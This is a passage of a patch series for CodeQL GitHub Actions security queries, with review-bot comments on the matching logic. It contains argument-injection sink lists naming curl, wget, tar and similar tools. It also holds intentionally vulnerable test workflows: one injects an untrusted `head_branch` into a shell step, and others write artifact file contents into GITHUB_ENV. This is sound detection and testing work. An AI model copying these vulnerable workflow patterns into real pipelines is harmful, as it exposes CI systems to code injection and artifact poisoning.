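Review bot: In `GHRunArtifactDownloadStep`'s constructor the two `this.getACommand()` calls bind independently, so the `gh run download` command and the command mentioning `github.event.workflow_run.id` need not be the same one; a script that downloads a fixed run and merely echoes the id elsewhere (constructed case) still qualifies, a looseness the old line-based version shared. Binding both through one variable, `exists(string cmd | cmd = this.getACommand() | cmd.regexpMatch(".*gh\\s+run\\s+download.*") and cmd.matches("%github.event.workflow_run.id%"))`, keeps the match on a single command; `DirectArtifactDownloadStep` below has the same shape. The class body continues past the hunk.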
@@ -230,32 +213,25 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getScript() = script and - script.splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") and + this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - script.splitAt("\n").regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getScript().splitAt("\n").regexpMatch(unzipRegexp()) + this.getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - script.splitAt("\n").regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep() - .(Run) - .getScript() - .splitAt("\n") - .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(script - .splitAt("\n") + normalizePath(trimQuotes(this.getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) - .getScript() - .splitAt("\n") + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 134ce780eeed..801ccb6e9868 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -255,10 +255,13 @@ class PermissionActionCheck extends PermissionCheck instanceof UsesStep { class BashCommentVsHeadDateCheck extends CommentVsHeadDateCheck, Run { BashCommentVsHeadDateCheck() { - exists(string line | - line = this.getScript().splitAt("\n") and - line.toLowerCase() - .regexpMatch(".*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*date\\s+-d.*(commit_at|pushed_at|comment_at|commented_at).*") + // eg: if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + exists(string cmd1, string cmd2 | + cmd1 = this.getACommand() and + cmd2 = this.getACommand() and + not cmd1 = cmd2 and + cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") and + cmd2.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed|comment|commented)_at.*") ) } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 40c0c7da9eb9..923d950631d3 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -37,11 +37,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 4f54f38f2746..6f325ca4c939 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
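Review bot: The two commands matched in `BashCommentVsHeadDateCheck` only need to be distinct strings that each mention any of `(commit|pushed|comment|commented)_at`, so `date -d "$pushed_at"` plus `date -d "$PUSHED_AT"`, or a logging `echo $(date -d "$commit_at")` next to the real comparison, satisfies the check without ever comparing the commit time to the comment time; the replaced single-line regex at least tied both calls to one line. Require one call from each family and drop the string inequality: `cmd1.toLowerCase().regexpMatch("date\\s+-d.*(commit|pushed)_at.*") and` / `cmd2.toLowerCase().regexpMatch("date\\s+-d.*(comment|commented)_at.*")`. That `getACommand()` yields the `$(...)` substitutions of the `eg:` line as separate commands is not visible in this hunk, though it is consistent with the new `commands.expected` later in this series.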
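Review bot: `run.getAnAssignment(var_name, var_value)` replaces a regex that required the assignment to be the whole line and accepted `-` in the name; what the new predicate does with `export FOO=$(cat file)`, a quoted value `FOO="$(cat file)"`, or `local`/`declare` forms is not visible here, and the fixtures visible in this patch series do not exercise them. Add a fixture for the `export` and quoted-value cases so the behaviour is pinned either way, and record the accepted grammar at the call site: `// getAnAssignment: NAME=VALUE commands; export/declare handling — confirm`. The rest of `EnvPathInjectionFromFileReadSink`'s characteristic predicate continues outside this hunk.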
@@ -42,11 +42,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 38a8d2b9d0b9..4a488f945b97 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -56,11 +56,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { // e.g. // FOO=$(cat test-results/sha-number) // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + exists(string var_name, string var_value | + run.getAnAssignment(var_name, var_value) and outputsPartialFileContent(var_value) and ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") @@ -154,11 +151,11 @@ class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { // A file is read and its content is printed to stdout // - run: echo "foo=$( Date: Wed, 2 Oct 2024 12:34:01 +0200 Subject: [PATCH 559/707] Add new Argument Injection sinks --- ql/lib/ext/config/argument_injection_sinks.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) 
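Review bot: After this change the body of `EnvVarInjectionFromFileReadSink` is identical to `EnvPathInjectionFromFileReadSink` and `OutputClobberingFromFileReadSink` in the neighbouring hunks (an assignment from `run.getAnAssignment`, `outputsPartialFileContent` on the value, then the `$VAR` / `${VAR` / `$ENV{VAR` match), so a fix to one will drift from the other two. Consider a shared predicate, e.g. `predicate fileReadAssignmentFlowsTo(Run run, string value)`, that all three sink classes call. The class's remaining conjuncts continue outside this hunk.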
diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml
index ab523c59303c..95f813131685 100644
--- a/ql/lib/ext/config/argument_injection_sinks.yml
+++ b/ql/lib/ext/config/argument_injection_sinks.yml
@@ -5,12 +5,12 @@ extensions:
 # https://gtfobins.github.io/
 # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection
 data:
- - ["(awk)(.*?)", 2, 3]
- - ["(curl)(.*?)", 2, 3]
- - ["(find)(.*?)", 2, 3]
- - ["(git)(.*?)", 2, 3]
- - ["(sed)(.*?)", 2, 3]
- - ["(tar)(.*?)", 2, 3]
- - ["(wget)(.*?)", 2, 3]
- - ["(zip)(.*?)", 2, 3]
+ - ["(awk)\\s(.*?)", 2, 3]
+ - ["(curl)\\s(.*?)", 2, 3]
+ - ["(find)\\s(.*?)", 2, 3]
+ - ["(git)\\s(.*?)", 2, 3]
+ - ["(sed)\\s(.*?)", 2, 3]
+ - ["(tar)\\s(.*?)", 2, 3]
+ - ["(wget)\\s(.*?)", 2, 3]
+ - ["(zip)\\s(.*?)", 2, 3]
 
From 805269683617f8d168234e1f8b646aa432b0830b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 2 Oct 2024 12:34:10 +0200
Subject: [PATCH 560/707] Add new Poisonable step for bun
---
 ql/lib/ext/config/poisonable_steps.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index f79ca795cd09..1543e2d8d459 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -19,6 +19,7 @@ extensions:
 - ["asv"]
 - ["awk\\s+-f"]
 - ["bundle"]
+ - ["bun"]
 - ["cargo"]
 - ["checkov"]
 - ["eslint"]
From 6b98a5b5b16266c360b5116e80d7afce07f60e03 Mon Sep 17 00:00:00 2001
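Review bot: The leading side of each sink pattern is still unanchored, so `(zip)\\s(.*?)` also matches `unzip -d out ...` and `gzip -c ...`, `(sed)\\s` matches `parsed --x`, and `(tar)\\s` matches `star ...`; the added `\\s` only stops the trailing-side matches such as `gitlab`. If the consuming predicate (not in this hunk) applies these with find rather than full-match semantics, prefix each entry with a non-capturing boundary so the capture indices `2, 3` are unchanged, e.g. `- ["(?:^|[\\s/])(zip)\\s(.*?)", 2, 3]`; `\\b` is shorter but still accepts `sub-zip`. `unzip` and `gzip` have different argument-injection profiles from `zip`, so if they are wanted they deserve their own entries rather than an accidental match.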
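Review bot: `["bun"]` is a bare prefix while the neighbouring entries are regexes such as `["awk\\s+-f"]`, and under a prefix or find match it also covers the already-listed `bundle` and `bunzip2 archive.bz2`, so a plain decompression step would be reported as executing attacker-controlled code. Write it as `["bun(\\s|$)"]` (or `["bun\\s"]` in the style of the awk entry) so only the bun runtime is matched; how the list is anchored is not visible in this hunk, so confirm against the consuming predicate.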
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 2 Oct 2024 12:34:27 +0200 Subject: [PATCH 561/707] Update tests --- .../.github/workflows/workflow_run_branches5.yml | 13 +++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 2 ++ .../.github/workflows/artifactpoisoning52.yml | 3 +-- .../.github/workflows/artifactpoisoning53.yml | 2 +- .../CWE-829/ArtifactPoisoningCritical.expected | 12 ++++++------ .../CWE-829/ArtifactPoisoningMedium.expected | 8 ++++---- .../CWE-829/UntrustedCheckoutCritical.expected | 2 +- 8 files changed, 30 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml new file mode 100644 index 000000000000..5e391db21aa6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches-ignore: ["foo"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 207fb3abf01b..61c851a2cfa8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
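Review bot: The new fixture does not say what it pins: its `name:` is copied from a real workflow ("Self-hosted runner (AMD mi250 CI caller)") rather than describing the case, and the only visible difference from its siblings is the `branches-ignore: ["foo"]` filter. The accompanying `.expected` changes in this commit list it under the Critical results while `workflow_run_branches4.yml` moves to Medium, presumably because an ignore filter still admits `head_branch` from every other branch and so cannot make the trigger trusted; a comment in the fixture would make that intent reviewable: `# branches-ignore cannot restrict workflow_run to trusted branches, so head_branch stays untrusted (Critical)` and `name: workflow_run with branches-ignore`.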
@@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | 
@@ -566,4 +567,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e5ad46888522..db8e7b485d76 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -447,6 +447,7 @@ nodes | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | 
@@ -490,3 +491,4 @@ subpaths | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml index 130668b8515d..e4845a6f2f16 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning52.yml @@ -18,8 +18,7 @@ jobs: - name: Env Var Injection run: | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" - ls | grep -E "*.(tar.gz|zip)$" >> "${GITHUB_ENV}" - ls | grep -E "*.(txt|md)$" >> "${GITHUB_ENV}" + cat foo >> "$GITHUB_ENV" echo "EOF" >> "${GITHUB_ENV}" diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml index 7c255e7722d8..67209267b5c5 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning53.yml @@ -18,7 +18,7 @@ jobs: - run: | { echo 'JSON_RESPONSE<> "$GITHUB_ENV" diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 74edee72f5f1..985af04112af 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected 
@@ -13,8 +13,8 @@ edges | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | 
@@ -44,9 +44,9 @@ nodes | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | 
@@ -67,8 +67,8 @@ subpaths | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> 